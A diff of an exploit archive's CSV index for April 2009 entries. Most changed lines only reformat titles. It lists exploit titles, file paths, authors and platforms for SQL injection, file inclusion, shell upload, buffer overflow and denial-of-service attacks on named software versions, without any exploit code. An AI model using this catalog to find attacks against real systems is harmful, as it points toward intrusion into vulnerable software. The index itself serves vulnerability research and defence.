-8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 (Auth Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0 +8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 +8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 +8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Auth Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8384,platforms/linux/remote/8384.txt,"net2ftp <= 0.97 - Cross-Site Scripting/Request Forgery Vulnerabilities",2009-04-09,cicatriz,linux,remote,0 -8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 +8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - (Auth Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8388,platforms/php/webapps/8388.txt,"PHP-Agenda <= 2.2.5 - Remote File Overwriting Vulnerabilities",2009-04-10,"Salvatore Fresta",php,webapps,0 -8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 +8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - (.cue) Stack Buffer Overflow PoC",2009-04-10,"fl0 fl0w",windows,dos,0 8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System ActiveX Control Heap Overflow PoC",2009-04-10,DSecRG,windows,dos,0 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-server Directory Traversal",2009-04-10,DSecRG,windows,remote,0 8393,platforms/hardware/dos/8393.txt,"Cisco ASA/PIX Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos,0 8394,platforms/php/webapps/8394.txt,"mozilocms 1.11 - (LFI/pd/XSS) Multiple Vulnerabilities",2009-04-10,SirGod,php,webapps,0 -8395,platforms/php/webapps/8395.txt,"Redaxscript 0.2.0 (language) Local File Inclusion",2009-04-10,SirGod,php,webapps,0 +8395,platforms/php/webapps/8395.txt,"Redaxscript 0.2.0 - (language) Local File Inclusion",2009-04-10,SirGod,php,webapps,0 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection Exploit",2009-04-10,DNX,php,webapps,0 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Remote Shell Upload",2009-04-10,ZoRLu,asp,webapps,0 8398,platforms/windows/remote/8398.php,"ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 8399,platforms/php/webapps/8399.pl,"Flatnuke <= 2.7.1 - (level) Remote Privilege Escalation Exploit",2009-04-13,StAkeR,php,webapps,0 -8401,platforms/windows/local/8401.cpp,"HTML Email Creator <= 2.1b668 (html) Local SEH Overwrite Exploit",2009-04-13,dun,windows,local,0 +8401,platforms/windows/local/8401.cpp,"HTML Email Creator <= 2.1b668 - (html) Local SEH Overwrite Exploit",2009-04-13,dun,windows,local,0 8402,platforms/windows/dos/8402.pl,"Mini-stream Ripper - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8403,platforms/windows/dos/8403.pl,"WM Downloader - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8404,platforms/windows/dos/8404.pl,"RM Downloader - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8405,platforms/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 -8406,platforms/openbsd/dos/8406.txt,"OpenBSD <= 4.5 (IP datagrams) Remote DoS",2009-04-13,Rembrandt,openbsd,dos,0 +8406,platforms/openbsd/dos/8406.txt,"OpenBSD <= 4.5 - (IP datagrams) Remote DoS",2009-04-13,Rembrandt,openbsd,dos,0 8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8408,platforms/php/webapps/8408.txt,"X10Media Mp3 - Search Engine < 1.6.2 Admin Access",2009-04-13,THUNDER,php,webapps,0 -8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 +8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - (lang) Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0 8410,platforms/windows/local/8410.pl,"RM Downloader 3.0.0.9 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8411,platforms/windows/local/8411.c,"WM Downloader 3.0.0.9 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8412,platforms/windows/local/8412.pl,"ASX to MP3 Converter 3.0.0.7 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8413,platforms/windows/local/8413.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.m3u) Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 -8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 (Auth Bypass) SQL Injection Vulnerabilities",2009-04-13,Dr-HTmL,php,webapps,0 -8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 (id) Remote SQL Injection",2009-04-13,NoGe,php,webapps,0 +8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Auth Bypass) SQL Injection Vulnerabilities",2009-04-13,Dr-HTmL,php,webapps,0 +8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - (id) Remote SQL Injection",2009-04-13,NoGe,php,webapps,0 8416,platforms/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu (blog.id) SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (XSS/DD) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 @@ -7937,40 +7937,40 @@ id,file,description,date,author,platform,type,port 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - Webserver Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service Exploit",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD <= 4.5 IP datagram Null Pointer Deref DoS Exploit",2009-04-14,nonroot,openbsd,dos,0 -8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 +8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS (username) SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) <= 1.2.2 - Multiple SQL Injection Vulnerabilities",2009-04-14,Dimi4,php,webapps,0 -8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 (Long URL) Local Stack Overflow PoC",2009-04-14,SuB-ZeRo,windows,dos,0 +8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 - (Long URL) Local Stack Overflow PoC",2009-04-14,SuB-ZeRo,windows,dos,0 8435,platforms/php/webapps/8435.txt,"W2B phpEmployment - (conf.inc) File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 -8436,platforms/php/webapps/8436.txt,"Job2C 4.2 (profile) Remote Shell Upload",2009-04-15,InjEctOr5,php,webapps,0 +8436,platforms/php/webapps/8436.txt,"Job2C 4.2 - (profile) Remote Shell Upload",2009-04-15,InjEctOr5,php,webapps,0 8437,platforms/php/webapps/8437.txt,"phpAdBoard (conf.inc) Remote Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8438,platforms/php/webapps/8438.txt,"phpGreetCards (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8440,platforms/php/webapps/8440.txt,"phpAdBoardPro (config.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8441,platforms/php/webapps/8441.txt,"phpDatingClub - (conf.inc) File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8442,platforms/php/webapps/8442.txt,"Job2C (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8443,platforms/php/webapps/8443.txt,"Job2C 4.2 (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 +8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 -8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 +8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 -8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 +8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Auth Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz (M3u File) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player .XPL Stack Buffer Overflow (SEH) PoC",2009-04-16,"fl0 fl0w",windows,dos,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 -8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 +8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 8456,platforms/multiple/local/8456.txt,"Oracle APEX 3.2 - Unprivileged DB users can see APEX password hashes",2009-04-16,"Alexander Kornbrust",multiple,local,0 -8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 +8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - (ficha.php) SQL Injection",2009-04-16,snakespc,php,webapps,0 8458,platforms/multiple/remote/8458.txt,"Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities",2009-04-16,DSecRG,multiple,remote,0 -8459,platforms/php/webapps/8459.htm,"eLitius 1.0 (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 +8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - (manage-admin.php) Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0 -8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 +8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 -8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 +8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Auth Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0 8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 @@ -7978,8 +7978,8 @@ id,file,description,date,author,platform,type,port 8469,platforms/linux/dos/8469.c,"XRDP <= 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 8470,platforms/linux/local/8470.py,"cTorrent/DTorrent - (.Torrent) Buffer Overflow Exploit",2009-04-17,"Michael Brooks",linux,local,0 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 -8472,platforms/php/webapps/8472.txt,"ClanTiger <= 1.1.1 (Auth Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 -8473,platforms/php/webapps/8473.pl,"ClanTiger <= 1.1.1 (slug) Blind SQL Injection Exploit",2009-04-17,YEnH4ckEr,php,webapps,0 +8472,platforms/php/webapps/8472.txt,"ClanTiger <= 1.1.1 - (Auth Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 +8473,platforms/php/webapps/8473.pl,"ClanTiger <= 1.1.1 - (slug) Blind SQL Injection Exploit",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 @@ -7987,39 +7987,39 @@ id,file,description,date,author,platform,type,port 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0 -8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload",2009-04-20,JosS,php,webapps,0 +8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Shell Upload",2009-04-20,JosS,php,webapps,0 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin (c) Remote SQL Injection",2009-04-20,OoN_Boy,php,webapps,0 8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (upload/id) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0 8484,platforms/windows/dos/8484.pl,"1by1 1.67 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Auth Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8487,platforms/php/webapps/8487.txt,"EZ Webitor (Auth Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 -8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit",2009-04-20,"Rohit Bansal",php,webapps,0 +8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection Exploit",2009-04-20,"Rohit Bansal",php,webapps,0 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)",2009-04-20,h00die,hardware,dos,0 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (ab/LFI) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 -8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 +8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection Exploit",2009-04-20,StAkeR,php,webapps,0 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 - (Auth Bypass) SQL Injection",2009-04-20,"Salvatore Fresta",php,webapps,0 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0 -8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 +8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 - (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0 8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0 -8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 +8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0 8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0 -8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion",2009-04-21,SirGod,php,webapps,0 +8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - (include) Local File Inclusion",2009-04-21,SirGod,php,webapps,0 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0 -8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 (id) Remote SQL Injection",2009-04-21,Player,php,webapps,0 -8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 (Cat_ID) Remote SQL Injection",2009-04-21,Player,php,webapps,0 +8505,platforms/php/webapps/8505.txt,"Quick.Cms.Lite 0.5 - (id) Remote SQL Injection",2009-04-21,Player,php,webapps,0 +8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) Remote SQL Injection",2009-04-21,Player,php,webapps,0 8507,platforms/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener PoC",2009-04-21,"Dennis Yurichev",windows,dos,0 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Auth Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0 8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - (LFI/su/ab/fd) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0 8511,platforms/windows/dos/8511.pl,"Xitami Web Server <= 5.0 - Remote Denial of Service Exploit",2009-04-22,"Jonathan Salwan",windows,dos,0 8512,platforms/windows/dos/8512.txt,"Counter Strike Source ManiAdminPlugin 2.0 - Remote Crash Exploit",2009-04-22,M4rt1n,windows,dos,0 -8513,platforms/php/webapps/8513.pl,"Dokeos Lms <= 1.8.5 (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 +8513,platforms/php/webapps/8513.pl,"Dokeos Lms <= 1.8.5 - (include) Remote Code Execution Exploit",2009-04-22,StAkeR,php,webapps,0 8514,platforms/php/webapps/8514.txt,"elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Auth Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote/Local File Inclusion Vulnerabilities",2009-04-22,ahmadbady,php,webapps,0 @@ -8030,8 +8030,8 @@ id,file,description,date,author,platform,type,port 8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (ab/LFI/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0 8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0 8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0 -8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 -8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 +8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 - (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0 +8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 - (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0 8526,platforms/windows/dos/8526.py,"Popcorn 1.87 - Remote Heap Overflow Exploit PoC",2009-04-23,x.CJP.x,windows,dos,0 8527,platforms/windows/local/8527.py,"CoolPlayer Portable 2.19.1 - (Skin) Buffer Overflow Exploit",2009-04-23,Stack,windows,local,0 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0 @@ -8044,17 +8044,17 @@ id,file,description,date,author,platform,type,port 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - (dt/fd) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 -8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 (route) Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0 +8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - (route) Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - (.m3u) File Buffer Overflow Exploit (seh)",2009-04-27,Nine:Situations:Group,windows,local,0 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 Base64FileEncode() BoF PoC",2009-04-27,Nine:Situations:Group,windows,dos,0 -8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 -8544,platforms/linux/dos/8544.pl,"iodined <= 0.4.2-2 (forged DNS packet) Denial of Service Exploit",2009-04-27,"Albert Sellares",linux,dos,0 +8543,platforms/php/webapps/8543.php,"LightBlog <= 9.9.2 - (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 +8544,platforms/linux/dos/8544.pl,"iodined <= 0.4.2-2 - (forged DNS packet) Denial of Service Exploit",2009-04-27,"Albert Sellares",linux,dos,0 8545,platforms/php/webapps/8545.txt,"dew-newphplinks 2.0 - (LFI/XSS) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - (index.php ln) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 -8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 (category) Remote SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 -8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 (order_sn) Remote SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 -8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 +8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) Remote SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 +8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) Remote SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 +8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8550,platforms/php/webapps/8550.txt,"Teraway LinkTracker 1.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8551,platforms/php/webapps/8551.txt,"Teraway FileStream 1.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 8552,platforms/php/webapps/8552.txt,"Teraway LiveHelp 2.0 Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",php,webapps,0 @@ -8062,24 +8062,24 @@ id,file,description,date,author,platform,type,port 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 -8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 +8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure 